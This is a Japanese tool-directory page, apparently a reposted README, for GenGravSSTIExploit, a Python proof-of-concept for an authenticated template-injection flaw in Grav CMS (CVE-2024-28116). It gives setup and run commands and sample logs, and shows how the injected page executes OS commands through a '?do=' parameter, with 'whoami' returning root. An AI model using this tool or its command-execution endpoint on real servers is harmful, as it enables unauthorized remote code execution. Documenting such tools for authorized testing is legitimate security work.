Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
GenGravSSTIExploit — は、Grav CMS バージョン <= 1.7.44 (CVE-2024-28116) における認証済みサーバーサイドテンプレートインジェクション (SSTI) の脆弱性を悪用するPoC Pythonスクリプトです。 | Kitploit
ツール/GitHubGitHub/geniuszly/gengravsstiexploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

は、Grav CMS バージョン <= 1.7.44 (CVE-2024-28116) における認証済みサーバーサイドテンプレートインジェクション (SSTI) の脆弱性を悪用するPoC Pythonスクリプトです。

リポジトリを見る
721年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

EN

GenGravSSTIExploit は、Grav CMS バージョン <= 1.7.44 (CVE-2024-28116) の認証済みサーバーサイドテンプレートインジェクション (SSTI) の脆弱性を悪用する PoC の Python スクリプトです。この脆弱性により、編集者権限を持つユーザーがリモートサーバー上で OS コマンドを実行できます。

注記: このスクリプトは、Grav CMS コンソールで認証するための有効な資格情報を必要とします。

機能

  • 編集者の資格情報を使用して Grav CMS 管理パネルに認証します。
  • ペイロードを注入するために CMS 上に新しいページを作成します。
  • SSTI の脆弱性を利用して OS コマンドをリモートで実行します。

必要条件

  • Python 3.x
  • requests ライブラリ (pip install requests でインストール)

使用方法

  1. リポジトリのクローン

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. 資格情報の設定

    スクリプトを編集して、Grav CMS の編集者資格情報を設定します:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. スクリプトの実行

    以下のコマンドでスクリプトを実行します:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: http[s]://hostname 形式のターゲット URL。
    • <PORT>: ポート番号 (デフォルトは 80)。

    例:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. エクスプロイトとの対話

    エクスプロイトが成功すると、OS コマンドを実行できる URL が表示されます:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

出力例

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

スクリプトは各ステップを実行し、ターミナルで進捗状況を報告します。表示される内容の例は次のとおりです:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

スクリプトの実行が完了すると、注入されたページへのリンクを含むメッセージが表示されます。このリンクにアクセスして OS コマンドを実行できます:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

指定したコマンドを含む URL にアクセスすると、出力がページ上に直接表示されます:

root@kitploit:~
Cmd-Output:
root

免責事項

このツールは教育目的のみを意図しています。責任を持って使用し、明示的な許可を得たシステムでのみ使用してください。著者は、このスクリプトによって引き起こされた誤用や損害について一切の責任を負いません。

ツールをダウンロード